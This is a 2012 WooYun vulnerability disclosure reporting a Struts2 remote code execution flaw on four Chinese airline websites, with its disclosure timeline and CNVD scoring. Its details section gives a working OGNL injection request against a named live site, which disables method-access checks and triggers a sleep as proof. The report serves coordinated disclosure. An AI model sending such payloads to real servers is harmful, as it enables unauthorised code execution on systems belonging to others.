当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06405

漏洞标题:[远程代码执行漏洞]西部航空 天津航空 首都航空 祥鹏航空

相关厂商:西部航空 天津航空 首都航空 祥鹏航空

漏洞作者: CnCxzSec(衰仔)

提交时间:2012-04-26 16:42

修复时间:2012-06-10 16:42

公开时间:2012-06-10 16:42

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-04-26: 细节已通知厂商并且等待厂商处理中
2012-04-30: 厂商已经确认,细节仅向厂商公开
2012-05-10: 细节向核心白帽子及相关领域专家公开
2012-05-20: 细节向普通白帽子公开
2012-05-30: 细节向实习白帽子公开
2012-06-10: 细节向公众公开

简要描述:

西部航空 天津航空 首都航空 祥鹏航空 远程代码执行漏洞
四个网站在一台服务器上,同样的问题,我打包发了。

详细说明:

POST /flight/multiway.action HTTP/1.1
Accept-Encoding: identity
Content-Length: 259
Host: www.luckyair.net
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Python-urllib/2.7
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(10000)')(d))


struts2的远程代码执行漏洞,执行任意代码。当然包括系统命令和上传文件咯。

漏洞证明:



举一反三,另外两个就不截图了。

修复方案:

专家懂的。感谢@icefish

版权声明:转载请注明来源 CnCxzSec(衰仔)@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2012-04-30 22:58

厂商回复:

CNVD 确认并复现相关过程,不过对于同一网站服务器的情况未能认定。
通过中国民航信息化管理部门处置。
对漏洞评分如下(以所述利用方式评分):
CVSS:(AV:R/AC:L/Au:NR/C:C/A:P/I:C/B:N) score:9.67(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对机密性、完整性造成完全影响,对可用性造成部分影响。
技术难度系数:1.0(一般,利用通用软件漏洞)
影响危害系数:1.3(较严重,研判涉及重要行业业务网站)
CNVD综合评分:9.67*1.0*1.3=12.571

最新状态:

暂无